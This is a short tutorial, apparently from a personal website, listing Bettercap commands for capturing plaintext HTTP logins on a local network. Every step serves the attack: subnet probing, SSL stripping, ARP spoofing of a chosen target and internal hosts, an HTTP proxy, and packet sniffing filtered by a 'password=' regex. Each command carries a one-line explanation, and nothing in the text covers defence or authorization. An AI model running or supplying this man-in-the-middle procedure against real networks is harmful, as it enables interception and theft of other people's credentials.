Using Bettercap to collects all http logins used by routers, servers, and websites that do not have SSL enabled
bettercap -iface eth0-iface: Specifies the interface to bind to.
net.probe onThis module will send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.
net.recon onThe net.recon module displays the detected active IP addresses in the network. In real-time, this module will start sniffing network packets.
set http.proxy.sslstrip trueThis module enables SSL stripping.
set arp.spoof.internal trueThis module spoofs the local connections among computers of the internal network.
set arp.spoof.targets [Target IP]This module spoofs the IP address of the target host.
http.proxy onThis module initiates http proxy.
arp.spoof onThis module initiates arp spoofing.
net.sniff onThis module is responsible for performing sniffing on the network.
set net.sniff.regexp '.*password=.+'This module will only consider the packets sent with a payload matching the given regular expression (in this case, ‘.*password=.+’).
set http.proxy.sslstrip true© 2023 javierizquierdovera.com
Licensed under the Apache License, Version 2.0 (LICENSE-APACHE) or the MIT license (LICENSE-MIT), at your option.
SPDX-License-Identifier: (Apache-2.0 OR MIT)